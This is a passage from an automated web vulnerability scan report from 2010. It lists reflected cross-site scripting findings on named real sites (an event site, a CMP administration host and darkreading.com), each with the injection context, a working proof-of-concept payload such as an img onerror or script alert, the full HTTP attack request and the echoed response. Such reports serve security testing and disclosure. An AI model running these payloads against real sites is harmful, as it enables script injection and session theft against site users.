This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /expo/event-testimonials.php/e64a7--><img%20src%3da%20onerror%3dalert(1)>c0d6bf373a3 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:30:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 30335
3.192. http://www.cloudconnectevent.com/expo/pr-opportunities.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/expo/pr-opportunities.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d40a--><img%20src%3da%20onerror%3dalert(1)>6de357e3dab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d40a--><img src=a onerror=alert(1)>6de357e3dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /expo/pr-opportunities.php/6d40a--><img%20src%3da%20onerror%3dalert(1)>6de357e3dab HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:30:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 32754
3.193. http://www.cloudconnectevent.com/expo/request-info.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/expo/request-info.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 14b26--><img%20src%3da%20onerror%3dalert(1)>7f0ff82a534 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14b26--><img src=a onerror=alert(1)>7f0ff82a534 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /expo/request-info.php/14b26--><img%20src%3da%20onerror%3dalert(1)>7f0ff82a534 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 34362
3.194. http://www.cloudconnectevent.com/media-sponsors.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/media-sponsors.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f8c8b--><img%20src%3da%20onerror%3dalert(1)>aca6cfde27e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8c8b--><img src=a onerror=alert(1)>aca6cfde27e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /media-sponsors.php/f8c8b--><img%20src%3da%20onerror%3dalert(1)>aca6cfde27e HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 51943
3.195. http://www.cloudconnectevent.com/registration/faq.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/registration/faq.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95792--><img%20src%3da%20onerror%3dalert(1)>0a7a9c6e9e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95792--><img src=a onerror=alert(1)>0a7a9c6e9e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /registration/faq.php/95792--><img%20src%3da%20onerror%3dalert(1)>0a7a9c6e9e1 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:27:08 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 31420
3.196. http://www.cloudconnectevent.com/registration/hotel-information.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/registration/hotel-information.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b9ad3--><img%20src%3da%20onerror%3dalert(1)>45b5968f374 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9ad3--><img src=a onerror=alert(1)>45b5968f374 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /registration/hotel-information.php/b9ad3--><img%20src%3da%20onerror%3dalert(1)>45b5968f374 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:27:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 30787
The value of the K request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f9bf"%3balert(1)//c5f2d9f983a was submitted in the K parameter. This input was echoed as 2f9bf";alert(1)//c5f2d9f983a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ars/techweb/gettemplate.do?mode=gettemplate&P=1&F=1002254&K=NZHA2f9bf"%3balert(1)//c5f2d9f983a&cid=IW_NZHA HTTP/1.1 Host: www.cmpadministration.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:26:49 GMT Set-Cookie: JSESSIONID=52ED9B97BFA8C2112D9A75540AEEB8D5.tomcat1; Path=/ars Content-Type: text/html;charset=UTF-8 Connection: close Set-Cookie: UBM-ARS=238132160.20480.0000; expires=Sun, 12-Dec-2010 01:32:03 GMT; path=/ Content-Length: 19427
<script> var pubcode = 'IK'; //version 1.2 command -2 Start var confirmQuitMsg = 'The InformationWeek Business Technology Network is FREE and allows you access to premium ...[SNIP]... <script language="JavaScript" >s.events = "event5";s.eVar16 = "IWK_Print";s.zip = "";s.state = "";s.eVar22 = "NZHA2F9BF";ALERT(1)//C5F2D9F983A";s.campaign = "";s.products = ";Informationweek New Subscription";s.eVar6 = "";s.eVar8 = "";s.eVar9 = "";s.eVar10 = "";var s_code=s.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the K request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd2c"><script>alert(1)</script>f56568929f7 was submitted in the K parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /ars/techweb/gettemplate.do?mode=gettemplate&P=1&F=1002254&K=NZHA5cd2c"><script>alert(1)</script>f56568929f7&cid=IW_NZHA HTTP/1.1 Host: www.cmpadministration.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:26:48 GMT Set-Cookie: JSESSIONID=A9A9771689176AD46F6CEB5467D36008.tomcat1; Path=/ars Content-Type: text/html;charset=UTF-8 Connection: close Set-Cookie: UBM-ARS=238132160.20480.0000; expires=Sun, 12-Dec-2010 01:32:02 GMT; path=/ Content-Length: 19457
<script> var pubcode = 'IK'; //version 1.2 command -2 Start var confirmQuitMsg = 'The InformationWeek Business Technology Network is FREE and allows you access to premium ...[SNIP]... <input type="hidden" name="K" value="NZHA5cd2c"><script>alert(1)</script>f56568929f7" /> ...[SNIP]...
3.199. http://www.darkreading.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfba"><script>alert(1)</script>6c2e3945f81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/?bcfba"><script>alert(1)</script>6c2e3945f81=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 204f7"><a>2afc7da3334 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700484204f7"><a>2afc7da3334/real-life-social-engineering.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bd9"><a>4039b14a500 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700484/real-life-social-engineering.htmlf8bd9"><a>4039b14a500 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2765a'><img%20src%3da%20onerror%3dalert(1)>e9a2d414f57 was submitted in the REST URL parameter 3. This input was echoed as 2765a'><img src=a onerror=alert(1)>e9a2d414f57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700484/real-life-social-engineering.html2765a'><img%20src%3da%20onerror%3dalert(1)>e9a2d414f57 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
3.203. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/227700484/real-life-social-engineering.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b7a"><script>alert(1)</script>db2f0dad75e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700484/real-life-social-engineering.html?78b7a"><script>alert(1)</script>db2f0dad75e=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de681"><a>3fe3823aebc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700498de681"><a>3fe3823aebc/finding-exposed-devices-on-your-network.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c424a"><a>e776e4b17a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.htmlc424a"><a>e776e4b17a1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1359'><img%20src%3da%20onerror%3dalert(1)>db4383fd428 was submitted in the REST URL parameter 3. This input was echoed as a1359'><img src=a onerror=alert(1)>db4383fd428 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.htmla1359'><img%20src%3da%20onerror%3dalert(1)>db4383fd428 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Finding E ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.htmla1359'><img src=a onerror=alert(1)>db4383fd428'> ...[SNIP]...
3.207. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f388"><script>alert(1)</script>60f81044a68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.html?4f388"><script>alert(1)</script>60f81044a68=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b4d"><a>ee7ca451d93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22770051018b4d"><a>ee7ca451d93/relying-on-tools-makes-you-dumber.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 165ec"><a>74d65ea8c93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html165ec"><a>74d65ea8c93 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65185'><img%20src%3da%20onerror%3dalert(1)>cb19eaf8a5f was submitted in the REST URL parameter 3. This input was echoed as 65185'><img src=a onerror=alert(1)>cb19eaf8a5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html65185'><img%20src%3da%20onerror%3dalert(1)>cb19eaf8a5f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Relying O ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html65185'><img src=a onerror=alert(1)>cb19eaf8a5f'> ...[SNIP]...
3.211. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16e3"><script>alert(1)</script>4c2502febec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html?e16e3"><script>alert(1)</script>4c2502febec=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a362"><a>06eb3ea4e55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/2277005248a362"><a>06eb3ea4e55/virtual-machines-for-fun-profit-and-pwnage.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload edec8'><img%20src%3da%20onerror%3dalert(1)>deb97097fba was submitted in the REST URL parameter 3. This input was echoed as edec8'><img src=a onerror=alert(1)>deb97097fba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.htmledec8'><img%20src%3da%20onerror%3dalert(1)>deb97097fba HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ec9"><a>cf08a1794b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html32ec9"><a>cf08a1794b7 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Virtual M ...[SNIP]... tual-machines-for-fun-profit-and-pwnage.html32ec9%22%3E%3Ca%3Ecf08a1794b7&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html32ec9"><a>cf08a1794b7"> ...[SNIP]...
